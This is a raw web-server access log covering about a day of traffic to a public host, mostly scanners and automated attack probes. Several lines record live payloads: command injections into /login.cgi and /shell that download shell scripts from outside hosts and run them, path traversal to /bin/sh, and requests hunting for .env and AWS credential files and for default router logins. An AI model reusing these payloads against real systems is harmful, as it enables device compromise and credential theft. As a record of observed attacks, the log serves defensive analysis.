185.68.185.89 - - [09/Jul/2023:02:08:23 +0200] "GET /index.php HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0" 34.77.127.183 - - [09/Jul/2023:02:10:56 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0" 198.50.124.89 - - [09/Jul/2023:02:20:44 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 213.109.202.66 - - [09/Jul/2023:02:24:22 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 121.55.238.240 - - [09/Jul/2023:02:51:24 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 383 "-" "-" 94.127.202.83 - - [09/Jul/2023:02:55:36 +0200] "GET / HTTP/1.1" 200 423 "-" "Edge" 109.237.97.180 - - [09/Jul/2023:03:12:19 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.97.180 - - [09/Jul/2023:03:12:20 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 213.109.202.66 - - [09/Jul/2023:03:15:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 213.109.202.66 - - [09/Jul/2023:03:26:04 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 113.141.48.217 - - [09/Jul/2023:03:32:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 114.225.138.30 - - [09/Jul/2023:03:40:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 169.150.227.166 - - [09/Jul/2023:03:57:03 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:89.0) Gecko/20100101 Firefox/89.0" 213.109.202.66 - - [09/Jul/2023:04:00:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 167.248.133.50 - - [09/Jul/2023:04:23:13 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.248.133.50 - - [09/Jul/2023:04:23:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.50 - - [09/Jul/2023:04:23:13 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.248.133.50 - - [09/Jul/2023:04:23:14 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.50 - - [09/Jul/2023:04:23:15 +0200] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 111.20.101.19 - - [09/Jul/2023:04:28:22 +0200] "GET / HTTP/1.1" 400 383 "-" "-" 123.162.186.133 - - [09/Jul/2023:04:43:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 183.136.225.44 - - [09/Jul/2023:04:45:27 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 183.136.225.44 - - [09/Jul/2023:04:56:55 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.44 - - [09/Jul/2023:04:56:56 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 213.109.202.66 - - [09/Jul/2023:04:58:26 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 64.62.197.205 - - [09/Jul/2023:05:05:52 +0200] "\x16\x03\x01" 400 383 "-" "-" 198.235.24.51 - - [09/Jul/2023:05:14:27 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 72.55.136.154 - - [09/Jul/2023:05:27:08 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 72.55.136.154 - - [09/Jul/2023:05:27:08 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 72.55.136.154 - - [09/Jul/2023:05:27:08 +0200] "GET /favicon.ico HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 72.55.136.154 - - [09/Jul/2023:05:27:10 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 72.55.136.154 - - [09/Jul/2023:05:27:10 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 213.109.202.66 - - [09/Jul/2023:05:32:53 +0200] "GET /geoserver HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 175.107.1.33 - - [09/Jul/2023:06:02:46 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 378 "-" "-" 172.105.128.13 - - [09/Jul/2023:06:12:48 +0200] "\x16\x03\x01" 400 383 "-" "-" 104.248.20.24 - - [09/Jul/2023:06:22:23 +0200] "\x16\x03\x01" 400 383 "-" "-" 104.248.20.24 - - [09/Jul/2023:06:22:23 +0200] "\x16\x03\x01" 400 383 "-" "-" 104.248.20.24 - - [09/Jul/2023:06:22:23 +0200] "GET /client/get_targets HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 104.248.20.24 - - [09/Jul/2023:06:22:23 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 104.248.20.24 - - [09/Jul/2023:06:22:23 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 104.248.20.24 - - [09/Jul/2023:06:22:23 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 104.248.20.24 - - [09/Jul/2023:06:22:23 +0200] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 162.216.149.253 - - [09/Jul/2023:06:24:46 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 117.208.100.39 - - [09/Jul/2023:06:38:40 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 18.156.78.237 - - [09/Jul/2023:06:44:22 +0200] "GET / HTTP/1.1" 200 423 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 1.196.201.82 - - [09/Jul/2023:06:45:16 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 151.106.108.24 - - [09/Jul/2023:06:54:54 +0200] "GET /.aws/credentials HTTP/1.1" 404 299 "-" "python-requests/2.28.1" 45.128.232.62 - - [09/Jul/2023:06:56:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 194.169.175.167 - - [09/Jul/2023:07:19:13 +0200] "GET /alfa-rex.php7 HTTP/1.1" 404 301 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 222.217.86.135 - - [09/Jul/2023:07:22:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 222.217.86.135 - - [09/Jul/2023:07:40:25 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 92.42.107.232 - - [09/Jul/2023:07:43:55 +0200] "GET /.aws/credentials HTTP/1.1" 404 296 "-" "python-requests/2.28.1" 34.250.236.140 - - [09/Jul/2023:07:46:35 +0200] "GET /.aws/credentials HTTP/1.1" 404 294 "-" "python-requests/2.28.1" 167.94.138.35 - - [09/Jul/2023:08:09:02 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.94.138.35 - - [09/Jul/2023:08:09:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.138.35 - - [09/Jul/2023:08:09:03 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.94.138.35 - - [09/Jul/2023:08:09:03 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.138.35 - - [09/Jul/2023:08:09:03 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 185.233.19.23 - - [09/Jul/2023:08:17:58 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 198.235.24.216 - - [09/Jul/2023:09:18:54 +0200] "\x16\x03\x01" 400 383 "-" "-" 64.62.197.182 - - [09/Jul/2023:09:50:19 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" 192.155.90.220 - - [09/Jul/2023:09:50:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.62.197.190 - - [09/Jul/2023:09:51:53 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0" 64.62.197.193 - - [09/Jul/2023:09:52:25 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" 217.138.192.222 - - [09/Jul/2023:10:31:33 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:89.0) Gecko/20100101 Firefox/89.0" 205.210.31.49 - - [09/Jul/2023:11:53:39 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 49.234.79.173 - - [09/Jul/2023:12:01:40 +0200] "-" 408 - "-" "-" 79.17.3.242 - - [09/Jul/2023:12:06:37 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 139.59.45.181 - - [09/Jul/2023:12:13:11 +0200] "\x16\x03\x01" 400 383 "-" "-" 139.59.45.181 - - [09/Jul/2023:12:13:12 +0200] "\x16\x03\x01" 400 383 "-" "-" 139.59.45.181 - - [09/Jul/2023:12:13:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.45.181 - - [09/Jul/2023:12:13:12 +0200] "GET /client/get_targets HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.45.181 - - [09/Jul/2023:12:13:13 +0200] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0" 139.59.45.181 - - [09/Jul/2023:12:13:13 +0200] "\x16\x03\x01" 400 383 "-" "-" 139.59.45.181 - - [09/Jul/2023:12:13:13 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.45.181 - - [09/Jul/2023:12:13:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)" 139.59.45.181 - - [09/Jul/2023:12:13:14 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.45.181 - - [09/Jul/2023:12:13:14 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.45.181 - - [09/Jul/2023:12:13:15 +0200] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 162.243.151.35 - - [09/Jul/2023:13:32:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 92.118.39.83 - - [09/Jul/2023:13:38:46 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 92.118.39.83 - - [09/Jul/2023:13:38:46 +0200] "POST / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 51.159.164.227 - - [09/Jul/2023:14:00:41 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" 51.159.164.227 - - [09/Jul/2023:14:00:41 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" 71.6.134.230 - - [09/Jul/2023:15:02:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 45.88.97.234 - - [09/Jul/2023:15:06:34 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:60.0) Gecko/20100101 Firefox/60.0" 71.6.134.230 - - [09/Jul/2023:15:35:17 +0200] "\x16\x03\x01" 400 383 "-" "-" 162.243.151.11 - - [09/Jul/2023:15:37:19 +0200] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 156.219.85.83 - - [09/Jul/2023:16:39:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+141.98.6.123/sensi.sh;sh+/tmp/sensi.sh HTTP/1.1" 404 346 "-" "Hello, world" 107.189.13.111 - - [09/Jul/2023:17:02:40 +0200] "CONNECT cdnjs.cloudflare.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 222.217.86.135 - - [09/Jul/2023:17:23:26 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 213.5.130.61 - - [09/Jul/2023:17:38:25 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 163.123.142.176 - - [09/Jul/2023:17:40:20 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.27.1" 163.123.142.176 - - [09/Jul/2023:17:40:21 +0200] "GET /.env HTTP/1.1" 404 287 "-" "python-requests/2.27.1" 144.126.194.255 - - [09/Jul/2023:17:51:53 +0200] "\x16\x03\x01" 400 383 "-" "-" 144.126.194.255 - - [09/Jul/2023:17:51:53 +0200] "\x16\x03\x01" 400 383 "-" "-" 144.126.194.255 - - [09/Jul/2023:17:51:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 45.156.129.7 - - [09/Jul/2023:18:34:42 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 31.220.3.140 - - [09/Jul/2023:19:45:43 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 222.73.129.25 - - [09/Jul/2023:19:56:23 +0200] "GET /wp-login.php HTTP/1.1" 404 299 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 107.170.250.10 - - [09/Jul/2023:20:00:30 +0200] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x" 198.199.97.203 - - [09/Jul/2023:20:23:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 110.43.84.22 - - [09/Jul/2023:21:03:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 109.237.98.226 - - [09/Jul/2023:21:12:51 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.98.226 - - [09/Jul/2023:21:12:51 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 85.208.139.122 - - [09/Jul/2023:21:19:39 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 117.196.112.39 - - [09/Jul/2023:21:31:36 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 117.196.112.39 - - [09/Jul/2023:21:31:36 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 150.158.52.150 - - [09/Jul/2023:22:36:50 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 150.158.52.150 - - [09/Jul/2023:22:37:10 +0200] "-" 408 - "-" "-" 150.158.52.150 - - [09/Jul/2023:22:37:11 +0200] "-" 408 - "-" "-" 150.158.52.150 - - [09/Jul/2023:22:37:18 +0200] "-" 408 - "-" "-" 66.94.97.49 - - [09/Jul/2023:23:05:57 +0200] "GET /cgi-bin/luci HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1" 91.224.92.16 - - [09/Jul/2023:23:13:54 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 81.170.248.248 - - [09/Jul/2023:23:23:31 +0200] "GET / HTTP/1.1" 200 423 "-" "Edge" 141.98.11.207 - - [09/Jul/2023:23:23:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 89.23.148.176 - - [10/Jul/2023:00:02:45 +0200] "GET / HTTP/1.1" 200 423 "-" "Edge" 159.223.112.185 - - [10/Jul/2023:00:37:08 +0200] "GET /.aws/credentials HTTP/1.1" 404 301 "-" "python-requests/2.28.1" 109.237.98.235 - - [10/Jul/2023:00:46:35 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.98.235 - - [10/Jul/2023:00:46:35 +0200] "\x16\x03\x01" 400 383 "-" "-" 79.124.49.14 - - [10/Jul/2023:00:53:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11" 194.169.175.158 - - [10/Jul/2023:01:01:24 +0200] "GET /wp-content/plugins/wp-daft/t62.php HTTP/1.1" 404 313 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 188.213.34.78 - - [10/Jul/2023:01:28:00 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:85.0) Gecko/20100101 Firefox/85.0" 45.128.232.62 - - [10/Jul/2023:01:34:40 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 142.93.148.73 - - [10/Jul/2023:01:39:17 +0200] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 104.199.31.214 - - [10/Jul/2023:01:55:35 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0"